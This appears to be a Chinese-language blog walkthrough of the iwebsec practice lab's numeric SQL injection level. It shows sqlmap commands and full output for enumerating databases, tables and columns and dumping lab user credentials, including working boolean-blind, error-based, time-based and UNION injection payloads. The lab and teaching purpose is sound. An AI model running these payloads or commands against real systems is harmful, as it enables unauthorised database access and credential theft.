首页 > 其他分享 >iwebsec_wp

iwebsec_wp

时间:2023-02-26 11:01:34浏览次数:47  
标签:sqlmap INFO based 21 wp iwebsec id

前言

  1. 在线靶场:点击此处即可到达靶场地址-->>>iwebsec
    image

2.本地搭建:使用官方所介绍的方法 点击跳转官网image
iwebsec官网

(1)docker hub下载,命令 docker pull iwebsec/iwebsec
(2)VMware虚拟机环境下载地址链接:https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib 提取码: 0aib
iwebsec靶场配套书籍《Web安全原理分析与实践》
这里更加推荐使用本地环境。

sql注入漏洞

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

数字型注入

image
打开靶场注入点已给出
image
/01.php?id=1

sqlmap

使用sqlmap判断是否存在漏洞

sqlmap -u http://192.168.70.157/sqli/01.php?id=1

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:28:48

[21:28:48] [INFO] resuming back-end DBMS 'mysql' 
[21:28:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:28:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:28:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:28:48

爆数据库名

记录sqlmap的使用方法

命令如下
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:24:43

[21:24:43] [INFO] resuming back-end DBMS 'mysql' 
[21:24:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:24:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:24:43] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] iwebsec
[*] test

[21:24:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:24:43

爆数据库列名

这里以iwebsec为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:31:12

[21:31:12] [INFO] resuming back-end DBMS 'mysql' 
[21:31:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:31:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:31:12] [INFO] fetching tables for database: 'iwebsec'
Database: iwebsec
[4 tables]
+-------+
| user  |
| sqli  |
| users |
| xss   |
+-------+

[21:31:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:31:13

爆字段

这里可以看到有user,sqli,users,xss的表,接下来就是直接爆字段这里以user表为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:33:41

[21:33:42] [INFO] resuming back-end DBMS 'mysql' 
[21:33:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:33:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:33:42] [INFO] fetching columns for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[21:33:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:33:42

获取该字段中的信息

获取id账号密码信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:41:40

[21:41:40] [INFO] resuming back-end DBMS 'mysql' 
[21:41:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:41:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:41:40] [INFO] fetching entries of column(s) 'id, password, username' for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[21:41:40] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
[21:41:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:41:40

获取数据库所有用户信息

sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:44:37

[21:44:37] [INFO] resuming back-end DBMS 'mysql' 
[21:44:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:44:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:44:37] [INFO] fetching database users
database management system users [1]:
[*] 'iwebsec'@'localhost'

[21:44:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:44:37

直接枚举数据库信息

--current-db可以查看网站使用的当前数据库
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch

点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:26:09

[21:26:09] [INFO] resuming back-end DBMS 'mysql' 
[21:26:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1 OR NOT 1065=1065#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:26:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:26:09] [INFO] fetching current database
current database:    'iwebsec'
[21:26:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:26:09] [INFO] fetching current database
[21:26:09] [INFO] fetching tables for database: 'iwebsec'
[21:26:09] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+------------------------------------------------------+----------+
| id | email                 | username                                             | password |
+----+-----------------------+------------------------------------------------------+----------+
| 1  | [email protected]     | user1                                                | pass1    |
| 2  | [email protected]     | user2                                                | pass2    |
| 3  | [email protected]     | user3                                                | pass3    |
| 4  | [email protected]     | admin                                                | admin    |
| 5  | [email protected]           | 123                                                  | 123      |
| 6  | [email protected]          | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    | 123      |
| 7  | [email protected] | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# | 123456   |
+----+-----------------------+------------------------------------------------------+----------+

[21:26:09] [INFO] table 'iwebsec.sqli' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/sqli.csv'
[21:26:09] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[1 entry]
+----+---------+
| id | name    |
+----+---------+
| 1  | iwebsec |
+----+---------+

[21:26:09] [INFO] table 'iwebsec.xss' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/xss.csv'
[21:26:09] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1  | user1    | pass1    |
| 2  | user2    | pass2    |
| 3  | user3    | pass3    |
+----+----------+----------+

[21:26:09] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
[21:26:09] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+----------+-------------+
| role  | username | password    |
+-------+----------+-------------+
| admin | orange   | mall123mall |
+-------+----------+-------------+

[21:26:09] [INFO] table 'iwebsec.users' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/users.csv'
[21:26:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'

[*] shutting down at 21:26:09

标签:sqlmap,INFO,based,21,wp,iwebsec,id
From: https://www.cnblogs.com/zy4024/p/iwebsec_wp.html

相关文章

  • soulLike wp
    IDA打开呈现简单判断中间的函数用于判断开头是否为actf{主要在于后面的sub_83A函数。打开发现查找资料将参数改后成功打开发现是个3000多行的函数,简单分析后决定用......
  • WPF ItemsControl Command 绑定操作
    视图模型:usingSystem.Collections.ObjectModel;usingSystem.Diagnostics;usingSystem.Windows.Input;usingCommunityToolkit.Mvvm.ComponentModel;usingCommuni......
  • WPF知识点备忘录——样式
    <Window.Resources><!--只对Control类及其派生类有效,若改成Button则只对Button有效--><Stylex:Key="Style1"><SetterProperty="Con......
  • WPF知识点备忘录——控件
    Grid<GridMargin="3,3,10,3"><Grid.ColumnDefinitions><ColumnDefinitionWidth="auto"/><ColumnDefinitionWidth="*"/>......
  • WPF知识点备忘录——命令
    定义:跟应用程序的一些高级任务绑定的函数,可以避免重复的编写事件处理函数;当连接的命令不可用时,命令特性通过自动禁用控件来管理用户界面的状态。继承关系:Routed......
  • WPF资料整理1
    1、框架类Prism: https://github.com/PrismLibrary/PrismPrism是用于在WPF,Windows10UWP和XamarinForms中构建松耦合,可维护和可测试的XAML应用程序的框架ReactivUI:......
  • WPF图标库——MahApps.Metro.IconPacks
    1.https://github.com/MahApps/IconPacks.Browser下载下载后在bin目录下运行“IconPacks.Browser”挑选需要使用的图标运行后如下:  2.选择想要使用的图标,拷贝代码......
  • WPF知识点备忘录——元素绑定
    1.元素绑定<SliderName="sliderFontSize"Margin="3"Value="10"/><TextBlockMargin="10"Text="AAA"FontSize="{BindingElementName=sliderFontSize,Path=Val......
  • WPF知识点备忘录——依赖项属性、路由事件
    1.依赖项属性定义:在普通属性上封装了些专门用于实现WPF功能的属性publicstaticreadonlyDependencyPropertyMarginProperty;publicThicknessMargin......
  • c语言之各种printf(printf, sprintf, snprintf, swprintf, fprintf, fwprintf, vsprin
    一、v|s|f|n|w的含义v:参数作为va_list一个整体传入s:输出对象为内存缓冲区(char*,wchar_t*)f:输出对象为文件流(char*,wchar_t*)w:宽字符串版本n......